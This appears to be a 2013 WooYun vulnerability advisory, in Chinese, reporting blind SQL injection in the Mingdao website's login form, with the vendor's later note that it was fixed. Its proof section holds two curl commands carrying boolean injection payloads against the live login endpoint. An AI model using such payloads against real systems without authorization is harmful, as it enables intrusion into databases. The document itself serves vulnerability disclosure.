当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037160

漏洞标题:明道网站登录页面存在SQL注入漏洞

相关厂商:上海万企明道软件有限公司

漏洞作者: 路人甲

提交时间:2013-09-16 15:40

修复时间:2013-10-31 15:41

公开时间:2013-10-31 15:41

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-10-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

登录页面提交登录表单的用户名字段存在SQL注入漏洞。

详细说明:

登录页面采用JS对输入内容进行验证,但是绕过验证后可以提交SQL注入指令,并有盲注现象。

漏洞证明:

curl "http://www.mingdao.com/ajaxpage/DoLogin.aspx" --data "op=login&LoginName=1'or(1=2)and'1'='1&LoginPwd=123&PID=&IsCookie=false"
{"IsLogin":"false","Status":"100","MSG":"用户名不存在。"}
curl "http://www.mingdao.com/ajaxpage/DoLogin.aspx" --data "op=login&LoginName=1'or(1=1)and'1'='1&LoginPwd=123&PID=&IsCookie=false"
{"IsLogin":"false","Status":"102","MSG":"用户名或密码不正确"}

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:暂时无回应

漏洞Rank:0

确认时间:2013-09-16 15:40

厂商回复:

最新状态:

2013-12-10:谢谢提交问题,已经修复!

2013-12-10:前段时间一直关注在产品上面,忽略了认领,经过测试之后,发现并无实质性后果,当然我们也做了些预防的策略。